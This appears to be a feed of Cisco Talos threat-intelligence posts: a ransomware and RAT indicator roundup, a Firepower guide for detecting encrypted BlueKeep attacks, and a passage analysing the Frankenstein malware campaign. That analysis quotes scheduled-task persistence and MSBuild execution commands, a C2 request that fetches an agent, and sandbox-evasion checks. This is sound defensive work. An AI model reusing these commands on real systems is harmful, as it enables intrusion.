6067621b4ecf4018e42e5ed195a8e179a3e6c259025b6f248e6b8bbd2b205704
6a73e94427c84a3e16e9c2c7ee4404ae93137cd08852fbb33dda67bacebbf0a6
6c2c7bab2520d774d6054b789047916f59f741b561db2710351b96e36b10f000
710436e038f3406ba539b2fdf91478ba44b4ac14e4738ef9dbc25fc0b2fe7105
712119bcb97d93941e5668fe8977fdbf5a06eb435d7b611094a87caf54fffb72
747c08074c51758e03b550d571830cbcdaaf0ce6ad6721d7d07de7f0f3df0b62
8662a730cdb3d3303e5ae5ef9beafd74473487fac7f06542f0154cbbe56284f9
8a5f573dd497c0d1adc337bf71f6a37b9b9cb0ba79607950c7fc92cc45508c16
94bceae74cc733290eaa6830bfc61bfdeeafaf1d609439d5d9bc718b8ffc668a
989eaa8e832dee1ea28452e91c30556ed1b84cb38d1381361770469c599db4ce
See JSON for more IOCs

Coverage

Screenshots of Detection

AMP

ThreatGrid

Win.Ransomware.Gandcrab-6984356-1

Indicators of Compromise

Registry Keys	Occurrences
`<HKCU>\CONTROL PANEL\DESKTOP Value Name: Wallpaper`	3
`<HKLM>\SOFTWARE\WOW6432NODE\ex_data`	3
`<HKLM>\SOFTWARE\WOW6432NODE\EX_DATA\data`	3
`<HKLM>\SOFTWARE\WOW6432NODE\keys_data`	3
`<HKLM>\SOFTWARE\WOW6432NODE\KEYS_DATA\data`	3
`<HKLM>\SOFTWARE\WOW6432NODE\EX_DATA\DATA Value Name: ext`	3
`<HKLM>\SOFTWARE\WOW6432NODE\KEYS_DATA\DATA Value Name: public`	3
`<HKLM>\SOFTWARE\WOW6432NODE\KEYS_DATA\DATA Value Name: private`	3
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\Notify`	2
`<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List`	2
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST Value Name: C:\Windows\system32\rundll32.exe`	2
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\gctilof`	2
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\GCTILOF Value Name: Impersonate`	2
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\GCTILOF Value Name: Asynchronous`	2
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\GCTILOF Value Name: MaxWait`	2
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\GCTILOF Value Name: DllName`	2
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\GCTILOF Value Name: Startup`	2
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: gctilof`	2

Mutexes	Occurrences
`A16467FA7-343A2EC6-F2351354-B9A74ACF-1DC8406A`	20
`Global\8B5BAAB9E36E4507C5F5.lock`	3
`Global\XlAKFoxSKGOfSGOoSFOOFNOLPE`	3
`A9MTX7ERFAMKLQ`	2
`A9ZLO3DAFRVH1WAE`	2
`AhY93G7iia`	2
`B81XZCHO7OLPA`	2
`BSKLZ1RVAUON`	2
`DRBCXMtx`	2
`F-DAH77-LLP`	2
`FNZIMLL1`	2
`FURLENTG3a`	2
`FstCNMutex`	2
`GJLAAZGJI156R`	2
`I-103-139-900557`	2
`I106865886KMTX`	2
`IGBIASAARMOAIZ`	2
`IGMJIA3OX`	2
`J8OSEXAZLIYSQ8J`	2
`LXCV0IMGIXS0RTA1`	2
`MKS8IUMZ13NOZ`	2
`NLYOPPSTY`	2
`OLZTR-AFHK11`	2
`OPLXSDF19WRQ`	2
`PLAX7FASCI8AMNA`	2
See JSON for more IOCs

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
`104[.]31[.]71[.]122`	10
`192[.]42[.]119[.]41`	4
`185[.]62[.]170[.]1`	3
`52[.]17[.]9[.]185`	3
`217[.]26[.]54[.]189`	3
`83[.]166[.]148[.]69`	3
`217[.]26[.]53[.]37`	3
`213[.]186[.]33[.]5`	3
`136[.]243[.]162[.]140`	3
`195[.]201[.]207[.]213`	3
`188[.]165[.]40[.]130`	3
`46[.]32[.]228[.]22`	3
`185[.]58[.]214[.]106`	3
`185[.]51[.]191[.]29`	3
`149[.]126[.]4[.]15`	3
`193[.]200[.]231[.]4`	3
`194[.]51[.]187[.]23`	3
`83[.]166[.]138[.]8`	3
`5[.]144[.]168[.]210`	3
`136[.]243[.]13[.]215`	3
`83[.]138[.]82[.]107`	3
`192[.]185[.]159[.]253`	3
`193[.]246[.]63[.]157`	3
`149[.]126[.]4[.]89`	3
`194[.]51[.]187[.]22`	3
See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
`electrumscoin[.]org`	10
`PALKANKA[.]SITE`	6
`doa[.]wolexsal[.]at`	5
`www[.]cantinesurcoux[.]net`	3
`www[.]pizcam[.]com`	3
`www[.]hotel-blumental[.]com`	3
`www[.]arbezie[.]com`	3
`www[.]holzbock[.]biz`	3
`www[.]disch[.]mehrmarken[.]net`	3
`www[.]alpenlodge[.]com`	3
`www[.]hotelolden[.]com`	3
`www[.]hotellido-lugano[.]com`	3
`www[.]petit-paradis[.]com`	3
`www[.]hotelrotonde[.]com`	3
`www[.]2mmotorsport[.]biz`	3
`www[.]flemings-hotels[.]com`	3
`www[.]hardrockhoteldavos[.]com`	3
`www[.]bnbdelacolline[.]com`	3
`www[.]arbezie-hotel[.]com`	3
`www[.]mountainhostel[.]com`	3
`www[.]lassalle-haus[.]org`	3
`www[.]alimentarium[.]org`	3
`www[.]bellevuewiesen[.]com`	3
`www[.]kroneregensberg[.]com`	3
`www[.]waageglarus[.]com`	3
See JSON for more IOCs

Files and or directories created	Occurrences
`%TEMP%\pidor.bmp`	3
`%HOMEPATH%\98b689da98b68e3f316.lock`	3
`%HOMEPATH%\AppData\98b689da98b68e3f316.lock`	3
`%APPDATA%\Media Center Programs\98b689da98b68e3f316.lock`	3
`%APPDATA%\Microsoft\98b689da98b68e3f316.lock`	3
`%APPDATA%\Microsoft\Internet Explorer\98b689da98b68e3f316.lock`	3
`%APPDATA%\Microsoft\Internet Explorer\Quick Launch\98b689da98b68e3f316.lock`	3
`%APPDATA%\98b689da98b68e3f316.lock`	3
`%HOMEPATH%\Cookies\98b689da98b68e3f316.lock`	3
`%HOMEPATH%\Desktop\98b689da98b68e3f316.lock`	3
`%HOMEPATH%\Documents\98b689da98b68e3f316.lock`	3
`%HOMEPATH%\Documents\My Music\98b689da98b68e3f316.lock`	3
`%HOMEPATH%\Documents\My Pictures\98b689da98b68e3f316.lock`	3
`%HOMEPATH%\Documents\My Videos\98b689da98b68e3f316.lock`	3
`%HOMEPATH%\Downloads\98b689da98b68e3f316.lock`	3
`%HOMEPATH%\Favorites\98b689da98b68e3f316.lock`	3
`%HOMEPATH%\Links\98b689da98b68e3f316.lock`	3
`%HOMEPATH%\Music\98b689da98b68e3f316.lock`	3
`%HOMEPATH%\My Documents\98b689da98b68e3f316.lock`	3
`%HOMEPATH%\NetHood\98b689da98b68e3f316.lock`	3
`%HOMEPATH%\Pictures\98b689da98b68e3f316.lock`	3
`%HOMEPATH%\PrintHood\98b689da98b68e3f316.lock`	3
`%HOMEPATH%\Recent\98b689da98b68e3f316.lock`	3
`%HOMEPATH%\Saved Games\98b689da98b68e3f316.lock`	3
`%HOMEPATH%\SendTo\98b689da98b68e3f316.lock`	3
See JSON for more IOCs

File Hashes

0056173ac7818058a9ef3025473fceff24386f8dd61c23b3ca53f332b7b8b756
010dd10aebe976dbf2473a656f0449c0a91aff6732d82fa605974d5452a1f882
0c3a00f9adfbb35f60aa3a67e02ee7fe5f01464d08825c2a0b181c5553809484
0cd7b76e663ef841a0468a4542f9594a212f682bda4fd13ac596c8dc375a70a1
0dd538728ed3de4c0f112e503825028c6de6a19d176093b4f8ee2aba784e96e4
12a9b70fb4e43716b450c37120a63c2da29e7a3c8657a95a1f318a4853550968
157f96de23735d1c41df83f0a4deba3a4c64d7d0b15d4cce28a9166131e085bc
19d7bab5cc8305e6fa1b248ceda3fb40dfe9d5256b1f8897350ccd2110c235d5
259220ed0a5fadd095aee079bf2fb8fa27f2204f3ebe95b588014bf4654d925d
411d66336a7a62138158211a0c9d47760cf072a86ea27cddfb173a59a4839a6e
4446a42ec66656956467df28df5c1e587d4c4cfd804201ba9912fd5729bb8f64
4b4f963ed8910f44f75ca75a2c21f7a31f600761bd97517246f7aa8f2ab5c4ff
4c9cb943f1efb719c8bb4907d89fa296bb53f010e53fd8f1da09667be0055aaf
50e6406dd568defee6835b152a2af2b82956004a87011d9da202648197dfaafe
510fd9535d75bf55e09028dc6f015798c7050d39f60b9ed86f7ce392d08ccc36
53248110e4f2ffb57520d2bbedc2cd4efe486c2a05243eb60807242bbfcbdd0e
5a70e3f4169bfc369c5d6686eb5f6a3170b39dc4fa5196d39d2d9409075665cf
5c562a47c8bb34f90f70377862dad9f134d6d5ae2d01595ea8225f51f8c7ed99
618d93da49f253e9ece275eaf87c9639489d5f876dec9b1ce6fb14fc22d1c175
66ef34785cdbbccb9cc46e69902d4e4f227134ddd2f8275430e3656480d79caa
729c6ae5d8415d8b49c646807a4b95ddef38626bce3303cf08c4cdcc505196cf
76151d8b9598ed85a90c04ce2b8c19fb93efc435b9982dd37565bdc92a494ad3
7872ffcf0a320ec62c57954bb55158876958adf3c9a41ff470da476a13cbbef7
796b0898478bb8ba453d4d974ab43aacf5c7e85bafa8e86133a284f47ab214d9
8775ce35c810ebe3d2e0f8a9c84b77e38bd5d2d682a4e65a3fc9f9a86df52aa1
See JSON for more IOCs

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Win.Malware.DarkComet-6983986-1

Indicators of Compromise

Registry Keys	Occurrences
`<HKLM>\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run`	1
`<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run`	1
`<HKLM>\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{16E11FA4-EASQ-57E4-QPP4-4B4EE7V76IQ4}`	1
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: system32`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: system32`	1
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{16E11FA4-EASQ-57E4-QPP4-4B4EE7V76IQ4} Value Name: StubPath`	1
`<HKLM>\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{0D285L58-7O12-HSU1-C880-04J8UU718520}`	1
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN Value Name: WinUpdate`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN Value Name: WinUpdate`	1
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{0D285L58-7O12-HSU1-C880-04J8UU718520} Value Name: StubPath`	1
`<HKCU>\SOFTWARE\Cofer2`	1
`<HKCU>\SOFTWARE\COFER2 Value Name: FirstExecution`	1
`<HKCU>\SOFTWARE\COFER2 Value Name: NewIdentification`	1

Mutexes	Occurrences
`\BaseNamedObjects\_x_X_UPDATE_X_x_`	13
`\BaseNamedObjects\_x_X_PASSWORDLIST_X_x_`	13
`\BaseNamedObjects\_x_X_BLOCKMOUSE_X_x_`	13
`\BaseNamedObjects\*MUTEX*`	4
`\BaseNamedObjects\*MUTEX*_SAIR`	4
`\BaseNamedObjects\*MUTEX*_PERSIST`	4

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
N/A	-

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
`loucao22[.]no-ip[.]org`	1

Files and or directories created	Occurrences
`%TEMP%\UuU.uUu`	4
`%TEMP%\XX--XX--XX.txt`	4
`%TEMP%\XxX.xXx`	4
`%APPDATA%\logs.dat`	4
`%System32%\install\server.exe`	2
`%SystemRoot%\SysWOW64\install`	1
`%SystemRoot%\install`	1
`%SystemRoot%\SysWOW64\install\explore.exe`	1
`%System32%\install\explore.exe`	1
`%SystemRoot%\install\flashplayer.exe`	1

File Hashes

001dadb87b55db69aaab1edcbf7c38bba929732e83c16d84278c992687d157fc
4ca9b2f8018dd2789f91fca2ad5a2281875bd3a6239a56ec29ff3ce366265d98
5780956f6411277398daf452baa75bdfcad2bd93c4a97af4e07ac0e20fbb9f0c
7ad5f208199b49bd14cbb26a1d8888c07692830d84b9be29920bc1db37c0b1e1
8a006d694bf6d30e2f711fce6e612d2880fba6d95085e41c57d0b76b88392b44
95728734cc57a788f44b2c8a7cf6601b0f4b7b2c05b85aa893a926d1c4c799d7
a9a09f58cc3dc6d6d097ee2ffcab7ec256c157d778979f5e80c1212ff68f3eb3
d2211069cc40d43f81d9c81274976aff64ff52e5858ed573d26cd5503dd563ee
d90b4a4ade207ebf768af252cf8d9b032158122670c50eb6bfafeec74d695f58
eb914c411fdc043c690ed0d1361d82d73dca6e764150c0bce4a20d9439df9c8b
ef2dae7f7d3a706a766ac41478adb9dd2dd871f88d458ace41e9813670cc99bd
f094dbe9dc2bbc7337e2aa1317317f1a7833bad9d966f01ebb582d51ce8d3b23
f1a0dda889f3af093b9092b8652fd7847de05015dee0914d36937c2ef641fa46
f51b96ebe4242a34754e14d0d2bc0dcd5ccd446f0eeb5fcdb9b7e03686dc40cc

Coverage

Screenshots of Detection

AMP

ThreatGrid

Exprev

Madshi injection detected (3512)
Madshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique.
Kovter injection detected (1779)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
PowerShell file-less infection detected (513)
A PowerShell command was stored in an environment variable and run. The environment variable is commonly set by a previously run script and is used as a means of evasion. This behavior is a known tactic of the Kovter and Poweliks malware families.
Process hollowing detected (478)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Gamarue malware detected (288)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
Dealply adware detected (285)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
Atom Bombing code injection technique detected (60)
A process created a suspicious Atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer. These Atoms are accessible across processes when placed in the global Atom table. Malware exploits this by placing shell code as a global Atom, then accessing it through an Asynchronous Process Call (APC). A target process runs the APC function, which loads and runs the shellcode. The malware family Dridex is known to use Atom Bombing, but other threats may leverage it as well.
Installcore adware detected (59)
Install core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
Suspicious PowerShell execution detected (55)
A PowerShell command has attempted to bypass execution policy to run unsigned or untrusted script content. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
Excessively long PowerShell command detected (54)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.

↧

Using Firepower to defend against encrypted RDP attacks like BlueKeep

May 31, 2019, 2:35 pm

≫ Next: It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign

≪ Previous: Threat Roundup for May 24 to May 31

This blog was authored by Brandon Stultz

Microsoft recently released fixes for a critical pre-authentication remote code execution vulnerability in Remote Desktop Protocol Servierces (RDP). Identified as CVE-2019-0708 in May's Patch Tuesday, the vulnerability caught the attention of researchers and the media due to the fact that it was "wormable," meaning an attack exploiting this vulnerability could easily spread from one machine to another. This was discussed at length in episode 54 of our 'Beers with Talos' podcast.

Cisco Talos started reverse-engineering work immediately to determine how exactly RDP was vulnerable. Talos wrote and released coverage as soon as we were able to determine the vulnerability condition. SID 50137 for SNORT® correctly blocks exploitation of CVE-2019-0708 and scanning attempts that leverage this vulnerability.

This rule prevents exploitation of CVE-2019-0708 by blocking any RDP connection that attempts to use the "MS_T120" virtual channel. The RDP protocol defines virtual channels that can be used to transfer different kinds of data (e.g. clipboard, audio, etc.). In addition to these client-specified channels, Microsoft creates the "MS_T120" channel in the Windows RDP system. Clients are not expected to create the "MS_T120" channel. A remote unauthenticated attacker can exploit CVE-2019-0708 by sending crafted data to this internal channel.

Since RDP servers are not aware of which virtual channels the client supports, the client provides a list of desired channels in the connect-initial packet at the start of the RDP session.

Client --> Connection Request --> Server
Client <-- Connection Confirm <-- Server
-- Optionally switch transport to TLS --
Client --> MCS connect-initial --> Server
Client <-- MCS connect-response <-- Server

It is possible to specify in the RDP connection request that the client is TLS capable. In most cases, this causes the server to switch the connection to TLS after the Connection Confirm packet. This means that Cisco Firepower will only scan the virtual channel list in the encrypted case if TLS decryption is set up for RDP.

While the aforementioned Snort rule can help protect against BlueKeep, it is still possible for attackers to carry out an encrypted attack — essentially sneaking past users and remaining undetected. Unless users set up TLS decryption for RDP on their Firepower device, there is a chance an attacker could exploit CVE-2019-0708 to deliver malware that would have the potential to spread rapidly.

The following is a guide to set up RDP decryption on Cisco Firepower. This guide specifically applies to Windows Server 2008 instances (newer versions of Windows Server are not vulnerable to BlueKeep). Additionally, Windows 7 only allows setting up a custom RDP certificate in the registry. It is possible to export the self-signed RDP certificate and private key in Windows 7 but this requires using the mimikatz tool as the private key for the auto-generated certificate is marked as "not exportable". Considering these hurdles, we focused on Windows Server 2008 for this guide.

*Note this procedure requires an inline Firepower device that supports SSL decryption. For more information, visit: Cisco Next-Generation Intrusion Prevention System (NGIPS) - Cisco.

Steps for RDP Decryption

1. Determine the certificate used by the RDP server
In Windows Server 2008, TLS certificates for RDP are configured in "Remote Desktop Session Host Configuration."

Once the remote desktop host configuration is opened, double-click on any RDP connections and note the certificate used by the RDP server — we will need this later.

2. Export the RDP certificate and private key
Open mmc.exe and navigate to: File -> Add/Remove Snap-in

Select "Certificates" on the left and click "Add."

Click "Computer account," "Next," then "Finish."
Finally, click "OK" to add the certificates snap-in.

Navigate on the left to the Local Computer certificates and locate, on the right, the certificate used by the RDP server we found before in the Remote Desktop Session Host Configuration.

Right click on the certificate and in "All Tasks" click on "Export."

Click "Yes, export the private key" in the Certificate Export Wizard then click "Next."

Make sure "Personal Information Exchange" is selected, then click "Next."

Type in an import password to encrypt the PFX file. Remember this password — we will need it later. Click "Next."

Type in a file name for the PFX file and click "Next."
Finally, click "Finish."

You have successfully exported the RDP certificate and private key.
Now, prepare them for the Firepower appliance.

3. Prepare the RDP certificate and private key for Firepower
For this step, you will need the OpenSSL tool and the PFX file exported in Step 2
(dc1.pfx in this example).
Extract the RDP certificate from the PFX file:

$ openssl pkcs12 -in dc1.pfx -clcerts -nokeys -out cert.pem
Enter Import Password:

The command above will ask for the import password, this is the password we typed in Step 2.
Extract the RDP private key from the PFX file:

$ openssl pkcs12 -in dc1.pfx -nocerts -out key.pem
Enter Import Password:
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:

The above command will ask for the import password again, as well as a PEM password. Remember this private key passphrase, — we will need it when we add the RDP certificate to Firepower.

4. Import the RDP key into Firepower
At this point, you should have the RDP cert "cert.pem," as well as the encrypted RDP private key "key.pem."

Navigate to Objects -> Object Management.

Select "Add Internal Cert" on the top right.

Name the certificate (e.g. the server name) and either paste in the "cert.pem" or browse to the "cert.pem" file in the "Certificate Data" section. Do the same for "key.pem" in the "Key" section. Click the "Encrypted" box and type in the PEM password from Step 3.

You have successfully imported the RDP certificate and private key. Now, create an SSL policy for decryption.

5. Create an SSL policy

Navigate to Policies -> SSL

Select "New Policy."

Enter a policy name and description with default action "Do not decrypt."

Once the policy editor has loaded, select "Add Rule" (top right).
Name the rule and give it the action "Decrypt - Known Key." Click the "with" field and select the certificate you imported earlier in Step 4.
If applicable, select "Source" and "Destination" networks or leave them as "any."

Click on the "Ports" tab and input the TCP port 3389 (if appropriate for your environment) under "Selected Destination Ports" and click "Add."

Under the "Logging" tab, enable logging at the end of the connection if desired.
Click "Add" and then "Save" to save the rule.
Additional SSL documentation is available here.

6. Enable the Intrusion Prevention Rule for BlueKeep

Navigate to Policies -> Access Control -> Intrusion Prevention.
Edit the desired Intrusion Policy.
Filter for Snort ID 50137 "OS-WINDOWS Microsoft Windows RDP MS_T120 channel bind attempt."
Click the checkbox and select Rule State -> Drop and Generate Events.

Click "Policy Information" and commit changes.

7. Configure the Access Control Policy
Navigate to Policies -> Access Control and edit the relevant Access Control Policy.

Under the "Advanced" tab, edit "SSL Policy Settings."

Select the SSL Policy we created in Step 5 and click "OK."

Ensure that your Intrusion Prevention Policy is selected under "Intrusion Policy used before Access Control rule is determined" in the "Network Analysis and Intrusion Policies" section of the "Advanced" tab.

Under the "Rules" tab of your Access Control Policy, ensure you have an appropriate Intrusion Policy set for any "Allow" rules.

If appropriate, enable the Intrusion Prevention Policy for your Default Action, as well.

Save and deploy changes.
Verify RDP connectivity and functionality.

Encrypted Exploit in Action

Let's start this by walking through what happens when the exploit is attempted on an unpatched, unprotected Windows 7 system.

As you can see, when the exploit is launched, it results in a denial of service on the system, as expected. Now we will demonstrate the process once you have enabled the SSL decryption for RDP, described in this blog, and leverage the detection capabilities of Firepower.

In this instance, no denial of service occurs and the system is unaffected, despite the attack being encrypted. Below is a screen capture showing SID 50137 alerting and dropping the encrypted BlueKeep exploit in Firepower.

Conclusion

Over the last several years we have seen several high profile vulnerabilities affecting services associated with various Windows services. Some, if not all, of these services should not be exposed to the internet. To reduce external exposure organizations need to take additional steps to ensure that services like RDP and SMB are not exposed unless explicitly required, but does not eliminate the need for patching. This is yet another example of why patching is one of the core fundamental concepts in information security. Vulnerabilities this severe appear periodically, and organizations need to be prepared to respond in a variety of different ways. Patching takes time and making sure that you have detection and prevention in place can require varying levels of difficulty. In this particular example, in order to get a higher level of visibility, SSL decryption is required for more thorough protections.

As encryption becomes more ingrained in the internet and more applications take advantage of it, these types of steps are going to become more common. Adversaries are always going to look for ways to evade any type of detection and using encryption is a great way to evade some of these technologies. Regardless, Cisco Talos will always be looking at the ways adversaries are operating and developing new and clever techniques to defeat them.

↧

It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign

June 4, 2019, 10:51 am

≫ Next: Threat Source newsletter (June 6)

≪ Previous: Using Firepower to defend against encrypted RDP attacks like BlueKeep

This blog was authored by Danny Adamitis, David Maynor and Kendall McKay.

Executive summary

Cisco Talos recently identified a series of documents that we believe are part of a coordinated series of cyber attacks that we are calling the "Frankenstein" campaign. We assess that the attackers carried out these operations between January and April 2019 in an effort to install malware on users' machines via malicious documents. We assess that this activity was hyper-targeted given that there was a low volume of these documents in various malware repositories. Frankenstein — the name refers to the actors' ability to piece together several unrelated components — leveraged four different open-source techniques to build the tools used during the campaign.

The campaign used components of:

An article to detect when your sample is being run in a VM
A GitHub project that leverages MSbuild to execute a PowerShell command
A component of GitHub project called "Fruityc2" to build a stager
A GitHub project called "PowerShell Empire" for their agents

We believe that the threat actors behind the Frankenstein campaign are moderately sophisticated and highly resourceful. The actors' preference for open-source solutions appears to be part of a broader trend in which adversaries are increasingly using publicly available solutions, possibly to improve operational security. These obfuscation techniques will require network defenders to modify their posture and procedures to detect this threat.

This report outlines the various anti-detection techniques used throughout the Frankenstein campaign. Some of these techniques included checking to see if any analysis tools, such as Process Explorer, were running in the background and determining whether the sample was inside of a virtual machine. The threat actors also took additional steps to only respond to GET requests that contained predefined fields, such as a non-existent user-agent string, a session cookie, and a particular directory on the domain. The threat actors also used different types of encryption in order to protect data in transit.

Trojanized documents

Talos has identified two different infection vectors associated with this particular campaign. In order to compromise their victims, the threat actors sent the trojanized Microsoft Word documents, probably via email. The first vector relies on a trojanized document that fetches a remote template and then uses a known exploit. The second vector is a trojanized Word document that prompts the victim to enable macros and run a Visual Basic script. We were able to correlate these two techniques to the same threat campaign due to overlapping threat actor C2.

In the first scenario, Talos discovered a document named "MinutesofMeeting-2May19.docx", that appeared to display the national flag of Jordan. Once the victim opens the document, it fetches a remove template from the actor-controlled website, hxxp://droobox[.]online:80/luncher.doc. Once the luncher.doc was downloaded, it used CVE-2017-11882, to execute code on the victim's machine. After the exploit, the file would run a command script to set up persistence as a scheduled task named "WinUpdate".

"/Create /F /SC DAILY /ST 09:00 /TN WinUpdate /TR" That scheduled task would run a series of base64-encoded PowerShell commands that acted as a stager. The stager will be described in more detail in the next section.

Example of the MinutesofMeeting-2May19.docx.

One of the samples we analyzed that prompted the victim to enable macros claimed to have "been secured by Kaspersky," a well-known anti-virus firm. While threat actors commonly create fake security labels for malicious documents, this technique could also indicate that the threat actor had performed reconnaissance on the intended victims, suggesting that the documents had been socially engineered to some degree.

Example of malicious Microsoft Word document.

Two other documents we associated with this group appeared to be more targeted in nature. One document contained logos that appear to be from several Middle Eastern countries' government agencies, while the other document showed an image of unspecified buildings that were possibly recognizable to a select group of targets.

Trojanized document containing official logos.

Trojanized document containing the image of unidentified buildings.

Visual Basic script and its anti-analysis features

As soon as the user enabled the macro, a robust Visual Basic Application (VBA) script began to execute. The VBA script contained two anti-analysis features. First, it would query Windows Management Instrumentation (WMI) to check if any of the following applications were running:

VMWare
Vbox
Process Explorer
Process Hacker
ProcMon
Visual Basic
Fiddler
WireShark

Next, the script would check to see if any of the following tasks were running:

VMWare
Vbox
VxStream
AutoIT
VMtools
TCPView
WireShark
Process Explorer
Visual Basic
Fiddler

A copy of the macro's code, which checks for analysis-oriented applications.

If any of the aforementioned applications or task names were discovered during the enumeration process, the script would stop execution. The next evasion technique was to call WMI and determine the number of cores allocated to the system. If the number of cores was less than two, the script would stop execution and the end user would receive a pop-up message stating "The File is not compatible with your Microsoft Office Version." We assess that this technique was modeled after a 2015 TrustedSec report as a way to detect if the sample was being run in a virtual machine or a sandbox environment.

Once the evasion checks were complete, the threat actors used MSbuild to execute an actor-created file named "LOCALAPPDATA\Intel\instal.xml". Based on lexical analysis, we assess with high confidence that this component of the macro script was based on an open-source project called "MSBuild-inline-task." While this technique was previously documented last year, it has rarely been observed being used in operations. Talos suspects the adversary chose MSBuild because it is a signed Microsoft binary, meaning that it can bypass application whitelisting controls on the host when being used to execute arbitrary code.

A copy of the threat actors' version of the MSbuild-inline-task.

The last line of the file would run encoded commands from the command line:

cmd.exe /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe LOCALAPPDATA\Intel\instal.xml C:\Windows\System32

Once the "instal.xml" file began execution, it would deobfuscate the base64-encoded commands. This revealed a stager, or a small script designed to obtain an additional payload. While analyzing this stager, we noticed some similarities to the "Get-Data" function of the FruityC2 PowerShell agent. One notable difference is that this particular stager included functionality that allowed the stager to communicate with the command and control (C2) via an encrypted RC4 byte stream. In this sample, the threat actors' C2 server was the domain msdn[.]cloud. A copy of the deobfuscated stager can be seen in the image below.

Copy of the deobfuscated stager.

When executed successfully, the stager connected to the C2. dHowever, in order to receive the agent, the request needed to contain the correct directory, user-agent string, and session cookie. The anticipated GET request appeared as follows:

GET /FC001/JOHN HTTP/1.1
Cookie: session=drYuSCFQdbQYHozM2dku17KYkY8=
User-Agent: Microsoft Internet Explorer
Host: msdn[.]cloud
Connection: Keep-Alive

If successful, the C2 would return a string of characters. Once the string was RC4 decrypted, it launched a PowerShell Empire agent. The PowerShell script would attempt to enumerate the host to look for certain information, such as:

Username
Domain name
Machine name
Public IP address
Checks if the current user has administrative privileges
Obtains a list of all currently running processes
Calls WMI to obtain operating system version
Obtains the security system's SHA256 HMAC

Once the aforementioned information was obtained, it was sent back to the threat actor's C2. Similar to the stager, the agent included functionality to communicate via an encrypted channel, in this case AES-CBC, in addition to using a specific user-agent string and a session key. This agent would allow the threat actors to remotely interact with the agent to upload and download files and to use the various plugins that were compatible with the Empire framework, such as those used to harvest credentials on the victim's machine. While this threat actor exhibited signs of sophistication, there were some small components that were overlooked. For example, it appears that the threat actor forgot to configure certain components for the Empire agent, such as leaving placeholder values for some variables like "WORKING_HOURS_REPLACE" and "REPLACE_KILLDATE".

Conclusion

